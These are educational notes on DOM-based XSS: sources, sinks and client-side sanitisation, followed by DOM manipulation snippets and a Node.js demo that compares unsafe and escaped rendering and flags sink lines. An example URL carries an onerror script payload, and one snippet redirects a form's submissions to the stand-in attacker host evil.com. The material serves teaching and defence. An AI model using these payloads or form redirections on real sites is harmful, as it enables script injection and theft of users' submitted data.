
DOM-based XSS

links: WS TOC - Cross Site Scripting (XSS) - Index


  • The Document Object Model (DOM) is the tree-like representation of a web page's content that JavaScript can read and modify (see the DOM manipulation examples below)
  • No server interaction is needed: the malicious payload is triggered by a script that is already on the page, which takes user-controlled input (typically part of the URL) and writes it into the page without proper handling, leading to script execution
  • Example
    • The website has JavaScript that prints the URL of the current page using document.write()
    • If an attacker can craft a URL that contains a script and get a victim to open it, that script is executed when the page loads
  • Main point
    • This type of XSS relies on the client-side environment to execute the malicious script; the payload never has to reach the server (for example, anything after the # in the URL is not sent in the HTTP request at all)
    • Bad because the server never gets a chance to sanitize the input, so server-side filters and a WAF do not help
    • Sanitization therefore has to happen on the client side: prefer sinks that treat data as text (textContent, createTextNode) over ones that parse it as HTML or code (document.write(), innerHTML, eval()), and encode untrusted data for the context it is inserted into when a markup sink cannot be avoided
  • Sources: where user-controlled input comes from
    • document.URL, location.href, location.search, location.hash, document.referrer, window.name
  • Sinks: where the user input goes to (dynamically adding / changing content on the page)
    • document.write(), innerHTML, element.src, eval()
// DOM manipulation examples (the example referred to in the first bullet)

// Create a new node and insert it in the tree
var newli = document.createElement("li");
var newtxtli = document.createTextNode("Four");
newli.appendChild(newtxtli);
document.getElementById("menu-list").appendChild(newli);

// Delete a node
var firstchild = document.getElementById("menu-list").firstChild;
document.getElementById("menu-list").removeChild(firstchild);

// Modify a node (attach a click handler; otherFunction is defined elsewhere on the page)
document.getElementById("addbutton").onclick = otherFunction;

// Change the title of a page
// innerHTML parses its value as HTML: this is a markup sink, so untrusted
// input here is DOM-based XSS
var title = document.getElementById("title");
title.innerHTML = "<h1>New Title</h1>";

// Remove the error messages
var node = document.getElementById("error_list");
while (node.firstChild) {
    node.removeChild(node.firstChild);
}

// Change the destination of a form
// The form's submissions now go to the attacker's server instead of the site
document.getElementById("form").action = "https://www.evil.com/dest";
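
The source-to-sink flow described in the notes above, as an added example that is not code from the original page. It models the vulnerable document.write(document.URL) pattern outside a browser so it runs under Node: the DOM sink is replaced by a function that returns the HTML string document.write() would hand to the parser, and ATTACK_URL, SAMPLE_PAGE_SCRIPT and the assumption that the page decodes its URL before writing it are all constructed for this example.

```javascript
// Added example (not from the original page): DOM XSS source -> sink, modelled
// outside a browser so it runs under Node. The document.write() sink is replaced
// by a function returning the HTML it would hand to the parser; ATTACK_URL and
// SAMPLE_PAGE_SCRIPT are constructed for this example.

// Constructed attacker URL. The payload sits in the fragment (#...), which the
// browser never includes in the HTTP request.
const ATTACK_URL = 'https://example.org/welcome#<img src=x onerror=alert(1)>';

// What the server receives for that navigation: path and query only. This is
// why a server-side filter or WAF never gets a chance to sanitize the payload.
function requestLineSeenByServer(url) {
  const u = new URL(url);
  return `GET ${u.pathname}${u.search} HTTP/1.1`;
}

// Vulnerable sink from the notes: the page concatenates its own URL into
// markup, i.e. document.write('<p>You are at: ' + document.URL + '</p>').
function renderUnsafe(url) {
  return '<p>You are at: ' + url + '</p>';
}

// Hardened form: same feature, but the untrusted value is HTML-escaped before
// it reaches a markup sink. In a real page, prefer assigning to textContent so
// the value is never parsed as HTML at all.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(url) {
  return '<p>You are at: ' + escapeHtml(url) + '</p>';
}

// Stand-in for the HTML parser: lists the element start tags in a string, so an
// injected <img ...> shows up as an extra element.
function startTags(html) {
  return [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9-]*)/g)].map((m) => m[1].toLowerCase());
}

// Caveat for testing: a WHATWG URL parser (Node, and browsers that follow the
// same standard) percent-encodes '<', '>' and spaces in the fragment, so the
// string document.URL / location.hash hands to the script is already encoded.
// The payload only reaches the sink intact if the page decodes it first; that
// is a common real-world pattern and is assumed here (urlAfterPageDecodes).
function urlAsHeldByBrowser(url) {
  return new URL(url).href;
}
function urlAfterPageDecodes(url) {
  return decodeURIComponent(urlAsHeldByBrowser(url));
}

// Grep-style triage of a page's scripts: flag lines that feed a known markup or
// code sink, using the source and sink names from the notes. Data flow through
// variables is not tracked, so this finds candidates to review, not proofs.
const SOURCES = ['document.URL', 'location.href', 'location.search', 'location.hash'];
const SINKS = ['document.write(', '.innerHTML', '.src =', 'eval('];

function flagSinkLines(jsSource) {
  return jsSource.split('\n')
    .map((line, i) => ({
      line: i + 1,
      sinks: SINKS.filter((s) => line.includes(s)),
      sources: SOURCES.filter((s) => line.includes(s)),
    }))
    .filter((r) => r.sinks.length > 0);
}

// Constructed page script: line 2 is the vulnerable document.write() from the
// notes; line 4 also reads a source, but textContent is not a markup sink.
const SAMPLE_PAGE_SCRIPT = [
  'var u = document.URL;',
  'document.write("<p>You are at: " + u + "</p>");',
  'var title = document.getElementById("title");',
  'title.textContent = location.search;',
].join('\n');

// Run the whole flow once and return the results.
function demo() {
  const pageUrl = urlAfterPageDecodes(ATTACK_URL);
  return {
    serverSees: requestLineSeenByServer(ATTACK_URL),
    unsafeTags: startTags(renderUnsafe(pageUrl)),
    safeTags: startTags(renderSafe(pageUrl)),
    flagged: flagSinkLines(SAMPLE_PAGE_SCRIPT).map((r) => r.line),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the server only ever sees `GET /welcome HTTP/1.1`, the unsafe rendering gains an `img` element the page author never wrote, the escaped rendering does not, and only the document.write() line of the sample script is flagged for review.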
